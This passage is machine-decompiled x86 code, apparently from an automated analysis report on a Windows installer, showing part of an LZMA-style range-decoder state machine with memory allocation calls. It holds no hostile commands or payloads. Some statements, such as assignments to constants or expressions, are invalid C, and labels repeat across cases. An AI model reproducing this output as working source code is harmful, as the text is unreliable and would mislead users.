                                                                                                                                                                                                                            						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                                                                                                                                                            						_t539 =  *(_t621 - 4) + 0x664;
                                                                                                                                                                                                                            						 *(_t621 - 0x58) = _t539;
                                                                                                                                                                                                                            						goto L68;
                                                                                                                                                                                                                            					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
                                                                                                                                                                                                                            												__eflags =  *(_t621 - 0x6c);
                                                                                                                                                                                                                            												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(_t621 - 0x88) = 3;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                                                                            												_t67 = _t621 - 0x70;
                                                                                                                                                                                                                            												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                                                                            												__eflags =  *_t67;
                                                                                                                                                                                                                            												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												L23:
                                                                                                                                                                                                                            												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                                                                                                                                                            												if( *(_t621 - 0x48) != 0) {
                                                                                                                                                                                                                            													goto L21;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												goto L24;
                                                                                                                                                                                                                            											case 4:
                                                                                                                                                                                                                            												L133:
                                                                                                                                                                                                                            												_t540 =  *_t614;
                                                                                                                                                                                                                            												_t597 = _t540 & 0x0000ffff;
                                                                                                                                                                                                                            												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                                                                                                                            												if( *(_t621 - 0xc) >= _t573) {
                                                                                                                                                                                                                            													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                                                                                                                            													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                                                                                                                            													 *(_t621 - 0x40) = 1;
                                                                                                                                                                                                                            													_t541 = _t540 - (_t540 >> 5);
                                                                                                                                                                                                                            													 *_t614 = _t541;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(_t621 - 0x10) = _t573;
                                                                                                                                                                                                                            													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													goto L139;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 5:
                                                                                                                                                                                                                            												goto L137;
                                                                                                                                                                                                                            											case 6:
                                                                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            													 *(__ebp - 0x34) = 1;
                                                                                                                                                                                                                            													 *(__ebp - 0x84) = 7;
                                                                                                                                                                                                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            													L132:
                                                                                                                                                                                                                            													 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                                                            													goto L133;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                                            												__cl = 8;
                                                                                                                                                                                                                            												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                                            												if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                                                            													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                                            														_t98 = __ebp - 0x38;
                                                                                                                                                                                                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                                            														__eflags =  *_t98;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                                                            												if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                                                                            													__ebx = 1;
                                                                                                                                                                                                                            													goto L61;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 8);
                                                                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                                                                            													__ebx = 1;
                                                                                                                                                                                                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                                            													goto L41;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 7:
                                                                                                                                                                                                                            												goto L0;
                                                                                                                                                                                                                            											case 8:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            													 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                                                            													 *(__ebp - 0x84) = 9;
                                                                                                                                                                                                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                            													L132:
                                                                                                                                                                                                                            													 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                                                            													goto L133;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 9:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													goto L89;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                                                            												if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                                            													goto L171;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                                            												__eflags = _t258;
                                                                                                                                                                                                                            												0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                                                                            												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                                                                            												goto L75;
                                                                                                                                                                                                                            											case 0xa:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            													 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                                                            													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            													while(1) {
                                                                                                                                                                                                                            														L132:
                                                                                                                                                                                                                            														 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                                                            														goto L133;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                                            												goto L88;
                                                                                                                                                                                                                            											case 0xb:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                                            												L88:
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												L89:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            												 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                                            												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                                            												goto L68;
                                                                                                                                                                                                                            											case 0xc:
                                                                                                                                                                                                                            												L99:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												_t334 = __ebp - 0x70;
                                                                                                                                                                                                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t334;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												goto L101;
                                                                                                                                                                                                                            											case 0xd:
                                                                                                                                                                                                                            												L37:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												_t122 = __ebp - 0x70;
                                                                                                                                                                                                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t122;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												L39:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                                            													goto L48;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                                                                            													goto L54;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L41:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                                            												 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                                                                            												__eax = __eax << 8;
                                                                                                                                                                                                                            												__eax = __eax + __ebx;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            												__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                                                                            													 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            													0x800 = 0x800 - __edx;
                                                                                                                                                                                                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													goto L39;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													goto L37;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 0xe:
                                                                                                                                                                                                                            												L46:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												_t156 = __ebp - 0x70;
                                                                                                                                                                                                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t156;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                            													L48:
                                                                                                                                                                                                                            													__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            													if(__ebx >= 0x100) {
                                                                                                                                                                                                                            														break;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            													__edx = __ebx + __ebx;
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            													__esi = __edx + __eax;
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            													__ax =  *__esi;
                                                                                                                                                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            													__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            														__cx = __ax;
                                                                                                                                                                                                                            														_t170 = __edx + 1; // 0x1
                                                                                                                                                                                                                            														__ebx = _t170;
                                                                                                                                                                                                                            														__cx = __ax >> 5;
                                                                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                                                                            														 *__esi = __ax;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            														0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            														__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            														 *__esi = __cx;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            														continue;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														goto L46;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L54:
                                                                                                                                                                                                                            												_t173 = __ebp - 0x34;
                                                                                                                                                                                                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                                            												__eflags =  *_t173;
                                                                                                                                                                                                                            												goto L55;
                                                                                                                                                                                                                            											case 0xf:
                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												_t203 = __ebp - 0x70;
                                                                                                                                                                                                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t203;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												L60:
                                                                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                                                                            													L55:
                                                                                                                                                                                                                            													__al =  *(__ebp - 0x44);
                                                                                                                                                                                                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                                            													goto L56;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L61:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												__edx = __ebx + __ebx;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                                                                            													_t217 = __edx + 1; // 0x1
